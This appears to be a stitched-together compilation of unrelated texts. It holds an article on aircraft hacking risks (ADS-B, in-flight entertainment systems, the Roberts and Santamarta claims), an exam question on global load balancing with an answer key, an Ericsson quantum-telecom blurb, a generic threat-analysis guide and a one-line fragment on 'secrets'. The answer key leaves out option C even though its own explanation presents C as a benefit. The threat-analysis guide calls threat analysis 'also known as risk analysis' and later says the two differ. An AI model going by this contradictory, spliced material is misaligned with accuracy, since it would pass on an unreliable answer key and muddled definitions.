Picture this: a terrorist armed not with weaponry but with a laptop. They hack into a commercial airplane's systems while hundreds of people are midair, seize control from the pilots, and steer it toward an unthinkable fate. This isn't an attack that can only exist in the lofty world of fiction; it's a potential reality in the world of aviation cybersecurity. If we don't design our systems securely, something of this nature could happen. The critical question is: how close are we to this scenario becoming a reality?

Think of an aircraft as a flying nexus of sophisticated systems, each a potential doorway for intrusion. Despite robust engineering focused on safety, no system is unbreakable, and the immense complexity of a plane's many instruments and interconnected networks only adds to the risk. Let's take a look at some of the major issues.

Automatic Dependent Surveillance-Broadcast (ADS-B) system

The ADS-B system, crucial to modern air traffic management, is implemented in countries like the United States and Australia and in parts of Europe. Its primary vulnerability lies in the lack of encryption and authentication of ADS-B messages. This flaw could, in theory, allow the injection of false aircraft positions or other misleading information. Because the broadcasts are unencrypted, anyone with a receiver can read them (the short decoding sketch at the end of this article shows how little that takes). Because they are unauthenticated, a reported position cannot be trusted on its own and must be double-checked against radar.

In-flight entertainment systems (IFEs)

Unlike other, more secured networks within an aircraft, IFEs are readily accessible to anyone on the plane, making them a more vulnerable target. They sit within easy reach of any passenger, raising the question of whether they could be manipulated to compromise an aircraft's critical systems. Thankfully, the flight control systems are supposed to be isolated from the IFEs, so even if a hacker does manage to break into the entertainment system, they cannot use that foothold to take over the plane.

Has anyone hacked a plane?

The story of cybersecurity analyst Chris Roberts has become somewhat legendary in aviation cybersecurity. According to a search warrant application filed by the FBI, Roberts claimed to have hacked into in-flight entertainment systems on multiple occasions between 2011 and 2014, once causing an airplane to climb and move laterally. He reportedly did this by accessing in-flight networks through an Ethernet cable connected to a box under the passenger seat.

This is a strange story, because we just told you that the flight control systems are supposed to be isolated from the IFEs. So what happened? It's hard to tell. Roberts' statements to Wired differ from those in the warrant application: "Roberts had previously told WIRED that he caused a plane to climb during a simulated test on a virtual environment he and a colleague created, but he insisted then that he had not interfered with the operation of a plane while in flight." It seems likely that at least some details in the warrant application are incorrect. Numerous experts have stated that the systems are in fact isolated, and that it would have been impossible for Roberts to jump from the IFE to the flight control systems.

Another well-known incident involved researcher Ruben Santamarta, who reported vulnerabilities in the Boeing 787 Dreamliner. In a blog post on his company's website, he claimed that in-flight entertainment systems may be an attack vector:
"In some scenarios such an attack would be physically impossible due to the isolation of these systems, while in others an attack remains theoretically feasible due to the physical connectivity. IOActive has successfully compromised other electronic gateway modules in non-airborne vehicles. The ability to cross the 'red line' between the passenger entertainment and owned devices domain and the aircraft control domain relies heavily on the specific devices, software and configuration deployed on the target aircraft."

Boeing, however, disputed the practicality of these claims, stating that its testing in both lab and real-world environments found existing defenses sufficient to prevent such scenarios. The FAA also worked with Boeing to assess the claims and was satisfied with Boeing's assessment. It's hard to give an independent verdict without delving deep into the network configuration, but even if we take Ruben Santamarta at his word that an attack is "theoretically feasible", it seems likely that it is still not a practical one. Neither Boeing nor the FAA want planes downed in cyberattacks, so it seems unlikely that they would knowingly leave gaping vulnerabilities between the IFE and the flight control systems.

So, is it really possible?

Considering the complexities of modern aircraft systems and the cybersecurity measures in place, the probability of successfully hacking a plane is extremely low. While vulnerabilities do exist and high-profile claims like those of Chris Roberts stir the pot, the reality is that exploiting these systems to gain control of an aircraft is incredibly difficult. The aviation industry is continually working on its cybersecurity to reduce these risks, and while the theoretical risks cannot be entirely dismissed, the practicality of such cyberattacks remains in doubt. Thankfully, aviation is one of the industries where we tend to err on the side of caution.
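A note on how low the bar is for the ADS-B weakness described earlier: "reading" an ADS-B broadcast requires no key at all, only slicing bits out of a publicly documented format. The short Python sketch below parses a widely circulated sample frame and is illustrative only; real tooling also decodes the position, velocity, and callsign fields, but none of that involves breaking any cryptography.

```python
# A widely circulated 112-bit Mode S extended squitter (ADS-B) test frame, hex-encoded.
msg = "8D4840D6202CC371C32CE0576098"

# Convert to a bit string; every field below is plaintext. There is no decryption step.
bits = bin(int(msg, 16))[2:].zfill(len(msg) * 4)

downlink_format = int(bits[0:5], 2)                # 17 = ADS-B extended squitter
icao_address = format(int(bits[8:32], 2), "06x")   # the broadcasting aircraft's ICAO ID
type_code = int(bits[32:37], 2)                    # 1-4 = aircraft identification message

print(downlink_format, icao_address, type_code)    # -> 17 4840d6 4
```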
Which four options describe benefits of the global load-balancing solution? (Choose four.)

A. Device status within the data center
B. Performance granularity
C. Centralized client access
D. Intelligent traffic management
E. Reacts quickly for availability only
F. Server monitoring statistics
G. Round robin support only for load-balancing

Correct answer: A, B, D, F

Global load balancing (GLB) is a technique that distributes incoming network traffic across multiple data centers or server farms located around the world. This solution provides numerous benefits:

A. Device status within the data center: With GLB, organizations can monitor the status of devices within each data center in real time. This allows them to quickly identify any potential issues or outages and take action to address them.

B. Performance granularity: GLB provides organizations with granular control over the performance of their applications. It allows them to route traffic to the most appropriate data center or server farm based on factors such as network latency, available bandwidth, and server load.

C. Centralized client access: With GLB, organizations can provide centralized access to their applications from anywhere in the world. This makes it easy for users to access the applications they need, regardless of their location.

D. Intelligent traffic management: GLB provides intelligent traffic management capabilities that allow organizations to route traffic based on a variety of criteria, including network topology, user location, and application performance.

E. Reacts quickly for availability only: This statement is not accurate because of the word "only". GLB solutions do react quickly to availability issues, routing traffic to the most appropriate data center or server farm, but availability is not the only condition they act on.

F. Server monitoring statistics: GLB solutions provide organizations with detailed server monitoring statistics, allowing them to identify performance bottlenecks, optimize resource utilization, and improve application performance.

G. Round robin support only for load-balancing: This statement is not accurate. GLB solutions support a variety of load-balancing algorithms, not round-robin alone, including round-robin, least-connections, and IP-hash.

In summary, the benefits of a global load-balancing solution are real-time device status monitoring (A), performance granularity (B), intelligent traffic management (D), and detailed server monitoring statistics (F).
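To make "intelligent traffic management" (option D) concrete, here is a minimal Python sketch of the kind of decision a GLB system makes. The site names, health flags, and the latency/load weighting are invented for illustration; real products use far richer telemetry and configurable policies.

```python
from dataclasses import dataclass

@dataclass
class Site:
    name: str
    healthy: bool      # device/server status feeding the decision (options A and F)
    latency_ms: float  # measured latency from the client's region (option B)
    load_pct: float    # current server load at the site

def pick_site(sites: list[Site]) -> Site:
    """Route to the healthy site with the best combined latency/load score."""
    healthy = [s for s in sites if s.healthy]
    if not healthy:
        raise RuntimeError("no healthy site available")
    # Lower score is better; the 2.0 weight on load is an arbitrary illustrative choice.
    return min(healthy, key=lambda s: s.latency_ms + 2.0 * s.load_pct)

sites = [
    Site("us-east", healthy=True, latency_ms=40.0, load_pct=70.0),    # score 180
    Site("eu-west", healthy=True, latency_ms=95.0, load_pct=20.0),    # score 135
    Site("ap-south", healthy=False, latency_ms=30.0, load_pct=10.0),  # down, excluded
]
print(pick_site(sites).name)  # -> eu-west
```

This also shows why "round robin support only" (option G) undersells GLB: the decision here is score-based, and round-robin would be just one of several selectable policies.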
Ericsson Research Identifies Challenges & Uses for Quantum Tech in Telecom (Ericsson.blog)

Ericsson Research has identified several potential use cases for quantum technology in telecom:

1) physical layer processing of the user data plane in the RAN (quantum Fourier transform and quantum linear solver)
2) clustering for automatic anomaly detection in a network design optimization project (quantum K-means algorithm)
3) prediction of the quality of user experience for video streaming based on device- and network-level metrics (quantum support vector machine)
4) database search at the data management layer (Grover's algorithm)

Quantum computing is just one of the many functions needed for the development of a quantum network that will deliver the quantum Internet, but it still has many challenges ahead. The most significant challenges that academia and industry need to address are:

- the development of error-correcting codes for error-free quantum computing
- the building of architectures and interfaces between quantum computers and communication systems
- the development of reliable quantum memories
- the development of quantum programming languages, compilers and a middleware stack

As the technology matures and quantum chips become available in more compact form factors (within the next 10 years), they could be deployed closer to user premises. Thus, in this second scenario, the quantum processor would be collocated with the baseband unit, but in this case the processor would be cloud-enabled to target acceleration of virtualized RAN functions; here the quantum accelerator is part of a distributed quantum computing system. Finally, when technology allows for miniaturization of both the chipset (see an example by Intel) and the refrigeration technology, the quantum processor/computer could be deployed locally in the digital unit to substitute the current accelerator.
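The algorithms Ericsson names are standard quantum primitives rather than anything proprietary. As a hedged illustration of the last one, the NumPy sketch below classically simulates Grover's search for one marked record in an unsorted 8-entry "database"; it has no connection to Ericsson's implementation and only shows why roughly (pi/4)*sqrt(N) iterations suffice where a classical scan needs about N/2 lookups.

```python
import numpy as np

n = 3                     # qubits, giving a database of N = 2**n entries
N = 2 ** n
marked = 5                # index of the record we are searching for

state = np.full(N, 1 / np.sqrt(N))   # uniform superposition over all N basis states

oracle = np.eye(N)
oracle[marked, marked] = -1          # oracle flips the sign of the marked entry

diffusion = 2 * np.full((N, N), 1 / N) - np.eye(N)  # inversion about the mean

iterations = int(np.pi / 4 * np.sqrt(N))            # ~2 for N = 8
for _ in range(iterations):
    state = diffusion @ (oracle @ state)

print(f"P(marked) after {iterations} iterations: {state[marked] ** 2:.3f}")  # ~0.945
```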
Threats are everywhere in today's world. From cyberattacks to natural disasters, organizations and individuals face a wide range of risks that can disrupt operations, cause financial loss, or harm people's well-being. In order to effectively protect themselves, it is crucial to have a clear understanding of potential threats and develop strategies to mitigate them. This is where threat analysis comes into play.

Threat analysis is a systematic process of identifying and evaluating potential threats that can impact an organization or an individual. It involves gathering information, assessing vulnerabilities, and determining the likelihood and potential impact of different threats. By conducting a thorough analysis, organizations can make informed decisions to minimize risks and enhance their security measures.

Threat analysis is an essential practice in today's interconnected and volatile world. It helps organizations and individuals identify potential risks, evaluate their impact, and develop strategies to mitigate them effectively. By understanding the various types of threats and implementing proactive measures, businesses can safeguard their assets, maintain continuity, and protect their reputation.

- What Is Threat Analysis?
- Importance of Threat Analysis in Today's World
- Types of Threats
- Process of Threat Analysis
- Benefits of Threat Analysis
- Tools and Techniques for Threat Analysis
- Case Studies: Real-World Examples
- Best Practices for Effective Threat Analysis
- Future Trends in Threat Analysis
- FAQs about Threat Analysis
- What do you mean by threat analysis?
- What is cyber security threat analysis?
- What are the 4 stages of threat analysis?
- What are the steps of threat analysis?
- What is the importance of threat analysis in cybersecurity?
- How does threat analysis differ from risk analysis?
- What are the key sources of information for threat analysis?
- How often should threat analysis be conducted?
- What are some common challenges in conducting threat analysis?
- How does threat analysis support decision-making?

What Is Threat Analysis?

Threat analysis, also known as risk analysis or threat assessment, is a systematic process of identifying and evaluating potential threats or risks to a system, organization, or individual. It involves the examination of various factors, vulnerabilities, and potential consequences in order to understand and prioritize threats.

The purpose of threat analysis is to gain insight into the potential harm that can be caused by threats and to develop strategies to mitigate or manage those risks effectively. By understanding the threats, their likelihood of occurrence, and their potential impact, organizations can make informed decisions and take appropriate actions to reduce their exposure to risks.

Threat analysis typically involves the following steps:

- Identification of assets: Determine the assets, systems, or processes that need protection or analysis.
- Threat identification: Identify and categorize potential threats that could pose risks to the identified assets. This can include natural disasters, cyberattacks, human errors, technological failures, or other potential hazards.
- Vulnerability assessment: Evaluate the vulnerabilities or weaknesses in the assets or systems that could be exploited by the identified threats.
- Risk assessment: Assess the likelihood and potential impact of each threat. This involves considering factors such as the probability of the threat occurring, the magnitude of its impact, and the effectiveness of existing controls or safeguards.
- Risk prioritization: Prioritize the identified risks based on their level of severity, allowing organizations to focus their resources on addressing the most significant threats.
- Risk mitigation: Develop and implement strategies to mitigate or manage the identified risks. This can include implementing security controls, developing contingency plans, conducting training and awareness programs, or adopting insurance coverage, among other measures.
- Monitoring and review: Continuously monitor the threat landscape, reassess risks periodically, and update the threat analysis process as necessary to ensure it remains relevant and effective.

Threat analysis is commonly employed in various domains, such as cybersecurity, physical security, emergency management, and business continuity planning, to proactively identify and address potential risks, protect assets, and ensure operational resilience.

Importance of Threat Analysis in Today's World

Threat analysis is of paramount importance in today's world due to the increasing complexity and evolving nature of the threats that individuals, organizations, and societies face. Here are several reasons why threat analysis is crucial:

- Proactive risk management: Threat analysis allows for proactive identification and assessment of potential risks before they materialize. By understanding and analyzing threats in advance, organizations can take preventive measures to mitigate or minimize their impact.
- Protection of assets and resources: Threat analysis helps identify vulnerabilities in critical assets and resources, such as information systems, infrastructure, intellectual property, and personnel. By recognizing potential threats and their associated risks, organizations can implement appropriate security measures to safeguard these valuable assets.
- Enhanced cybersecurity: In the digital age, cyber threats are pervasive and constantly evolving. Threat analysis plays a crucial role in understanding the latest cyber threats, vulnerabilities, and attack techniques. It enables organizations to strengthen their cybersecurity posture by implementing effective defenses, conducting vulnerability assessments, and developing incident response plans.
- Business continuity and resilience: Threat analysis assists in identifying potential disruptions that could impact business operations, such as natural disasters, supply chain disruptions, or technological failures. By conducting comprehensive threat analysis, organizations can develop robust business continuity plans, implement risk mitigation strategies, and ensure resilience in the face of adverse events.
- Decision-making and resource allocation: Threat analysis provides critical information for informed decision-making and resource allocation. By understanding the likelihood and potential impact of various threats, organizations can prioritize their efforts, allocate resources effectively, and make informed decisions about risk tolerance and investments in risk mitigation.
- Compliance and regulatory requirements: Many industries have specific compliance and regulatory requirements related to risk management and security. Threat analysis assists organizations in meeting these obligations by identifying potential threats, assessing risks, and implementing necessary controls to comply with legal and industry standards.
- Public safety and national security: Threat analysis plays a crucial role in safeguarding public safety and national security. It helps identify potential threats to society, such as terrorism, cyberattacks, or natural disasters, allowing governments and security agencies to develop strategies to prevent, detect, and respond to these threats effectively.

Threat analysis provides a structured and systematic approach to understanding and mitigating risks. By adopting a proactive mindset and integrating threat analysis into their operations, individuals and organizations can better protect their assets, ensure continuity, and respond effectively to the evolving threat landscape in today's complex world.

Types of Threats

Cyber threats refer to risks targeting computer systems, networks, and data. They include various malicious activities conducted by hackers, cybercriminals, and other threat actors. Examples of cyber threats include malware attacks, phishing scams, ransomware, data breaches, denial-of-service (DoS) attacks, and identity theft.

Physical threats encompass risks to tangible assets, infrastructure, and individuals. These threats can include theft, vandalism, unauthorized access, natural disasters (such as earthquakes, floods, or hurricanes), fire, accidents, and acts of violence or terrorism. Physical security measures, such as surveillance systems, access controls, and emergency response plans, are implemented to mitigate these risks.

Financial threats involve risks to an individual's or organization's financial well-being. This can include fraud, embezzlement, theft of funds, investment scams, unauthorized transactions, economic downturns, or market volatility. Effective financial management, internal controls, and fraud detection mechanisms are essential to mitigate financial threats.

Environmental threats refer to risks associated with the natural environment and ecological factors. These threats include climate change, pollution, resource depletion, natural disasters (such as hurricanes, floods, and wildfires), and environmental accidents (such as oil spills or chemical leaks). Mitigation strategies for environmental threats may involve sustainable practices, disaster preparedness, and conservation efforts.

Social threats involve risks related to human interactions, societal issues, and reputation. They can include public relations crises, negative public perception, social engineering attacks, defamation, discrimination, bullying, and social unrest. Organizations often employ communication strategies, stakeholder engagement, and social responsibility initiatives to manage social threats effectively.

It's important to note that these threat categories are not mutually exclusive, and threats can often overlap or intersect. For example, a cyber threat can have physical or financial implications, and environmental disasters can result in both physical and financial risks. By understanding and recognizing the different types of threats, individuals and organizations can develop comprehensive risk management strategies and implement appropriate measures to mitigate or respond to these risks effectively.

Process of Threat Analysis

Gathering Information

The first step in threat analysis is to gather relevant information about the system, organization, or context under analysis. This includes identifying critical assets, understanding the operational environment, reviewing existing security controls, and collecting data on previous incidents or threats.
Identifying Potential Threats

In this step, potential threats are identified based on the gathered information. This can involve brainstorming sessions, expert knowledge, historical data analysis, or threat intelligence sources. The goal is to identify the various threats that could potentially harm the assets or disrupt operations.

Assessing the Impact of Threats

Once potential threats are identified, the next step is to assess their potential impact on the organization or system. This includes analyzing the consequences that could arise if a threat materializes, such as financial losses, operational disruptions, reputational damage, legal or regulatory penalties, or harm to individuals' safety.

Evaluating Vulnerabilities

Vulnerabilities are weaknesses or gaps in the system or organization that could be exploited by threats. In this step, vulnerabilities are identified and assessed to understand the likelihood of threats successfully exploiting them. This evaluation can include technical assessments, security audits, penetration testing, or vulnerability scanning.

Developing Mitigation Strategies

After understanding the potential threats and vulnerabilities, mitigation strategies are developed to reduce or eliminate the risks. These strategies may involve a combination of preventive, detective, and corrective measures. Examples include implementing security controls, enhancing physical security, conducting employee training, creating incident response plans, or adopting business continuity measures.

It's important to note that threat analysis is an iterative process. As new information becomes available or the threat landscape evolves, the analysis should be reviewed and updated regularly to ensure its effectiveness.

By following a structured threat analysis process, organizations can gain a deeper understanding of the risks they face, prioritize their efforts and resources, and develop effective strategies to mitigate and manage those risks proactively.

Benefits of Threat Analysis

- Risk Reduction: Threat analysis helps in identifying potential risks and vulnerabilities, allowing organizations to implement preventive measures and controls. By understanding the threats they face, organizations can reduce the likelihood and impact of adverse events, minimizing potential losses and disruptions.
- Proactive Decision Making: Threat analysis enables proactive decision making by providing valuable insights into the risks and potential consequences associated with different courses of action. This empowers decision-makers to make informed choices, develop risk mitigation strategies, and allocate resources effectively to address the identified threats.
- Resource Optimization: Threat analysis helps in optimizing resource allocation by focusing efforts and resources on the most critical threats. By identifying and prioritizing risks, organizations can allocate their budget, manpower, and technological resources more efficiently, ensuring that resources are directed to areas where they are most needed.
- Enhancing Security Measures: Threat analysis allows organizations to identify gaps and weaknesses in their security measures. It provides a framework to assess and improve existing security controls, policies, and procedures to address the identified threats effectively. This leads to an enhanced security posture and a stronger defense against potential attacks or incidents.
- Business Continuity Planning: Threat analysis is instrumental in business continuity planning. By identifying potential threats and their potential impacts on critical operations, organizations can develop comprehensive contingency plans. These plans enable organizations to respond effectively to disruptions, recover operations efficiently, and minimize the negative consequences of incidents.

Threat analysis offers numerous benefits, including reducing risks, making proactive decisions, optimizing resource allocation, enhancing security measures, and facilitating business continuity planning. By investing in threat analysis, individuals and organizations can enhance their preparedness and resilience in the face of potential threats and ensure the long-term sustainability of their operations.

Tools and Techniques for Threat Analysis

SWOT (Strengths, Weaknesses, Opportunities, Threats) analysis is a framework used to assess the internal strengths and weaknesses of an organization (or individual) and the external opportunities and threats in its environment. It helps identify potential threats by analyzing factors such as competition, market trends, technological advancements, and regulatory changes.

PESTEL (Political, Economic, Sociocultural, Technological, Environmental, Legal) analysis is a tool used to examine the external macro-environmental factors that can impact an organization or system. It helps identify threats arising from changes in government regulations, economic conditions, social trends, technological advancements, environmental concerns, or legal factors.

Vulnerability scanning tools are used to identify vulnerabilities and weaknesses in computer systems, networks, and applications. These tools automatically scan for known vulnerabilities and misconfigurations, providing insights into potential entry points for cyber threats. By identifying vulnerabilities, organizations can take appropriate measures to address them and reduce the risk of exploitation.

Risk Assessment Software

Risk assessment software provides a systematic approach to identifying, assessing, and managing risks. These tools often include features such as risk identification templates, risk analysis algorithms, risk rating scales, and reporting capabilities. They help streamline the threat analysis process, facilitate risk prioritization, and support decision-making for risk mitigation strategies.

Threat Intelligence Platforms

Threat intelligence platforms aggregate, analyze, and disseminate information about emerging threats, vulnerabilities, and attack techniques. These platforms collect data from various sources, such as security blogs, forums, incident reports, and security researchers, and provide real-time threat intelligence to organizations. Threat intelligence platforms help organizations stay informed about the latest threats and take proactive measures to mitigate them.

Data Analytics and Machine Learning

Data analytics and machine learning techniques can be utilized to analyze large volumes of data and identify patterns or anomalies that may indicate potential threats. These techniques can help detect suspicious activities, identify emerging threats, and enable proactive threat mitigation.

It's important to note that these tools and techniques are not exhaustive, and the choice of tools may vary depending on the specific requirements and context of the threat analysis. Organizations often use a combination of these tools and techniques to gain comprehensive insights into potential threats and develop effective risk management strategies.
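As a minimal sketch of the "risk rating scales" and prioritization logic such tools encode, the Python fragment below scores threats on a simple likelihood-times-impact matrix. The 1-5 scales are a common convention, but the thresholds and example threats here are illustrative assumptions, not a standard.

```python
def risk_score(likelihood: int, impact: int) -> int:
    """Both inputs on a 1-5 ordinal scale; a higher score means a bigger risk."""
    return likelihood * impact

def risk_level(score: int) -> str:
    if score >= 15: return "critical"
    if score >= 8:  return "high"
    if score >= 4:  return "medium"
    return "low"

threats = [                          # (name, likelihood, impact): made-up examples
    ("phishing campaign",    4, 3),
    ("data-center flood",    1, 5),
    ("unpatched web server", 3, 5),
]

# Prioritize highest-scoring risks first, so mitigation effort goes where it matters most.
for name, l, i in sorted(threats, key=lambda t: -risk_score(t[1], t[2])):
    s = risk_score(l, i)
    print(f"{name:22s} likelihood={l} impact={i} score={s:2d} -> {risk_level(s)}")
```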
Case Studies: Real-World Examples

Threat Analysis in the Banking Sector

In the banking sector, threat analysis plays a crucial role in identifying and mitigating risks to protect financial institutions and their customers. One notable example is the analysis of fraud threats in online banking. Banks employ threat analysis techniques to identify potential vulnerabilities in their online banking systems, such as weaknesses in authentication mechanisms or vulnerabilities in transaction processing. By conducting threat analysis, banks can anticipate and address various fraud threats, including phishing attacks, account takeovers, malware-based attacks, or social engineering attempts.

For instance, a bank may conduct threat analysis by monitoring emerging fraud trends, studying attack techniques used by fraudsters, and analyzing historical fraud incidents. Based on the analysis, the bank can identify potential threats and their impact on customer accounts and financial systems. The analysis helps in developing preventive measures such as enhanced customer authentication methods, transaction monitoring systems, and employee training programs. This proactive approach helps banks mitigate risks, protect customer assets, and maintain trust in the banking system.

Threat Analysis in Cybersecurity

Threat analysis is a fundamental component of cybersecurity, where it aids in identifying and understanding potential cyber threats to protect organizations' digital assets. A notable example is the analysis of ransomware threats. Ransomware attacks have become increasingly prevalent, targeting various industries and organizations worldwide. Threat analysis enables cybersecurity professionals to study the behavior of ransomware strains, identify vulnerabilities that attackers exploit, and understand their propagation mechanisms.

For instance, a threat analysis of ransomware might involve analyzing malware samples, studying infection vectors (such as malicious emails or compromised websites), and assessing the impact of ransomware on different systems and data. By conducting threat analysis, organizations can enhance their defensive strategies by implementing measures like robust backup and recovery systems, network segmentation, endpoint protection solutions, and user awareness training. Additionally, threat analysis helps in staying up to date with the evolving tactics used by ransomware operators and adapting defensive measures accordingly.

These case studies illustrate how threat analysis is applied in specific sectors like banking and cybersecurity to proactively identify risks, develop effective mitigation strategies, and protect critical assets and operations.

Best Practices for Effective Threat Analysis

Regular Updates and Assessments

Threat landscapes are constantly shifting, with new threats emerging and existing ones evolving. It is crucial to regularly update and reassess the threat analysis process to stay current. This involves reviewing and incorporating the latest threat intelligence, monitoring industry trends, and conducting periodic assessments to identify any new threats or changes in the risk landscape.

Collaboration and Information Sharing

Threat analysis should involve collaboration and information sharing among relevant stakeholders, both within the organization and with external partners. Sharing information about emerging threats, vulnerabilities, and mitigation strategies can help create a collective defense approach. Collaboration fosters a broader perspective and enables organizations to benefit from the expertise and insights of others in the industry or security community.

Training and Education

Building a strong security culture is vital for effective threat analysis. Providing regular training and education to employees and stakeholders helps raise awareness about potential threats, teaches best practices for risk mitigation, and encourages a proactive mindset towards security. Training programs should cover topics such as recognizing phishing attempts, practicing good password hygiene, and adhering to security policies and procedures.

Continuous Monitoring

Threat analysis should be an ongoing and continuous process. Regularly monitoring systems, networks, and assets allows for timely detection of potential threats and vulnerabilities. Continuous monitoring enables organizations to identify suspicious activities, anomalous behavior, or indicators of compromise, allowing for quick response and mitigation actions.

Integration with Incident Response

Threat analysis should be closely integrated with incident response processes. Incident response plans should be developed and tested in conjunction with threat analysis activities. This ensures a coordinated and efficient response in the event of a security incident or breach. Lessons learned from incidents should also be fed back into the threat analysis process to continuously improve security posture.

Documentation and Documentation Review

Thorough documentation of threat analysis processes, findings, and mitigation strategies is crucial. It helps in maintaining a record of identified threats, vulnerabilities, and implemented controls. Regular review and update of documentation ensure that threat analysis activities remain up to date and aligned with organizational objectives.

By following these best practices, organizations can enhance the effectiveness of their threat analysis efforts, proactively identify and address potential risks, and better protect their assets and operations from emerging threats.

Future Trends in Threat Analysis

As technology continues to advance, several future trends are expected to shape the field of threat analysis. Here are three significant trends:

Artificial Intelligence and Machine Learning

Artificial intelligence (AI) and machine learning (ML) are poised to play a crucial role in threat analysis. These technologies can analyze vast amounts of data, identify patterns, and detect anomalies that might indicate potential threats. AI and ML can enhance the speed and accuracy of threat detection, enable proactive threat hunting, and improve incident response by automating certain tasks. Additionally, AI-powered threat intelligence platforms can provide real-time insights and predictive analytics, helping organizations stay ahead of evolving threats.

IoT and Connected Devices

The proliferation of Internet of Things (IoT) devices and the increasing connectivity of various systems and devices introduce new dimensions of threat analysis. IoT devices often have limited security controls and can be vulnerable to exploitation. Threat analysis will need to evolve to include the assessment of risks associated with interconnected devices, such as unauthorized access, data breaches, and attacks on critical infrastructure. The analysis will focus on understanding the potential impact of compromised IoT devices on overall system security and the associated risks to individuals and organizations.
Advanced Data Analytics

Advanced data analytics techniques, including big data analytics, predictive analytics, and behavioral analytics, will play a significant role in threat analysis. These techniques can process and analyze large volumes of data from diverse sources, enabling the identification of subtle patterns and indicators of potential threats. Advanced data analytics can help in identifying emerging threats, improving threat detection accuracy, and supporting decision-making processes. It can also enable organizations to leverage threat intelligence from multiple sources, including internal logs, external threat feeds, and dark web monitoring.

These future trends in threat analysis will require organizations to invest in advanced technologies, develop new skill sets within their security teams, and adapt their processes and methodologies. Embracing these trends will help organizations stay ahead of rapidly evolving threats, enhance their security posture, and effectively protect their assets and operations in the face of emerging risks.

FAQs about Threat Analysis

What do you mean by threat analysis?

Threat analysis is the process of identifying and assessing potential threats that could harm an organization, system, or individual. It involves analyzing the likelihood and impact of various threats and vulnerabilities, understanding the potential consequences, and developing strategies to mitigate or manage those risks.

What is cyber security threat analysis?

Cybersecurity threat analysis specifically focuses on identifying and evaluating threats in the digital realm. It involves analyzing potential cyber threats, such as malware, phishing attacks, data breaches, or network intrusions. Cybersecurity threat analysis aims to understand the tactics, techniques, and motivations of threat actors and develop effective strategies to detect, prevent, and respond to cyber threats.

What are the 4 stages of threat analysis?

The four stages of threat analysis typically include:

a) Gathering information: collecting relevant data about the system, organization, or context under analysis.
b) Identifying potential threats: identifying the various threats that could potentially harm the assets or disrupt operations.
c) Assessing the impact of threats: evaluating the potential consequences and impact of identified threats.
d) Evaluating vulnerabilities: identifying weaknesses or vulnerabilities that could be exploited by threats.

What are the steps of threat analysis?

The steps of threat analysis generally include:

a) Gathering information: collecting relevant data, such as asset inventory, system architecture, historical data, and threat intelligence.
b) Identifying potential threats: brainstorming, using expert knowledge, or leveraging threat intelligence sources to identify potential threats.
c) Assessing the impact of threats: analyzing the potential consequences and impact of identified threats on the organization or system.
d) Evaluating vulnerabilities: identifying vulnerabilities or weaknesses in the system that could be exploited by threats.
e) Developing mitigation strategies: creating strategies to reduce or eliminate risks by implementing security controls, policies, and procedures.

What is the importance of threat analysis in cybersecurity?

Threat analysis is vital in cybersecurity as it helps organizations proactively identify and assess potential cyber threats. It enables them to understand the evolving threat landscape, anticipate potential risks, and implement appropriate security measures. Threat analysis enhances incident response capabilities, minimizes the impact of cyber attacks, and protects sensitive data and systems from unauthorized access, data breaches, and other cyber threats.

How does threat analysis differ from risk analysis?

Threat analysis focuses on identifying and evaluating potential threats, such as malicious actors or harmful events, that can exploit vulnerabilities. Risk analysis, on the other hand, involves assessing the likelihood and impact of those threats combined with the vulnerabilities present in a system or organization. While threat analysis focuses on understanding the potential sources of harm, risk analysis takes into account the probability and potential consequences of those threats, enabling organizations to prioritize and manage risks effectively.

What are the key sources of information for threat analysis?

Key sources of information for threat analysis include internal sources, such as incident logs, security event data, and system logs. External sources, such as threat intelligence feeds, security forums, industry reports, and government advisories, also provide valuable insights into emerging threats and attack techniques. Collaboration and information sharing with other organizations, industry peers, and security communities can further enrich the information available for threat analysis.

How often should threat analysis be conducted?

Threat analysis should be conducted on a regular basis to account for the evolving threat landscape. The frequency depends on factors such as the industry, organizational context, and the rate of change in the threat landscape. Conducting threat analysis annually or semi-annually is a common practice, but organizations in high-risk sectors or those experiencing rapid changes may need more frequent assessments. Regular updates and assessments ensure that organizations stay proactive and responsive to emerging threats.

What are some common challenges in conducting threat analysis?

Common challenges in conducting threat analysis include the rapidly evolving threat landscape, the complexity of systems and networks, limited visibility into emerging threats, and the availability of skilled personnel. Gathering accurate and timely threat intelligence, keeping up with emerging attack techniques, and allocating sufficient resources for analysis can also pose challenges. It is crucial for organizations to stay updated, leverage automation and technology, and invest in the training and development of skilled security professionals to address these challenges effectively.

How does threat analysis support decision-making?

Threat analysis supports decision-making by providing valuable insights into potential risks and their potential impact. Decision-makers can use threat analysis to understand the likelihood and consequences of different threats and vulnerabilities, prioritize resources and investments, and make informed decisions about security controls, incident response plans, and risk mitigation strategies. By incorporating threat analysis into the decision-making process, organizations can align their security efforts with business objectives and allocate resources effectively to address the identified threats.
These FAQs provide further clarity on important aspects of threat analysis, its relationship with risk analysis, sources of information, frequency of assessments, common challenges, and its role in decision-making.

In conclusion, threat analysis is a crucial process for organizations to proactively identify, assess, and mitigate potential risks and threats. Throughout this discussion, we have covered various aspects of threat analysis, including its definition, stages, steps, and importance in different domains such as cybersecurity and the banking sector.

Recapping the key points, threat analysis involves gathering information, identifying potential threats, assessing their impact, evaluating vulnerabilities, and developing effective mitigation strategies. It helps organizations reduce risks, make proactive decisions, optimize resources, enhance security measures, and plan for business continuity.

We have also explored the benefits of threat analysis, including risk reduction, proactive decision-making, resource optimization, enhanced security measures, and support for business continuity planning. By following best practices such as regular updates and assessments, collaboration and information sharing, training and education, and continuous monitoring, organizations can ensure the effectiveness of their threat analysis efforts.

Looking ahead, future trends in threat analysis include the integration of artificial intelligence and machine learning, the impact of IoT and connected devices, and the use of advanced data analytics. Organizations should embrace these trends to stay ahead of evolving threats and protect their assets and operations effectively.

Threat analysis is an ongoing and critical process that empowers organizations to identify and address potential risks in a proactive and systematic manner. By implementing robust threat analysis practices, organizations can enhance their security posture, minimize the impact of threats, and safeguard their valuable resources and stakeholders. It is recommended that organizations prioritize threat analysis as an integral part of their overall risk management strategy to stay resilient in the face of emerging threats.
1 Introduction / Executive Summary

The term 'secrets' has recently been seconded into the IT lexicon. It is used as a collective noun for passwords, keys, certificates, and tokens that must not be disclosed, i.e., they must be 'kept secret'.

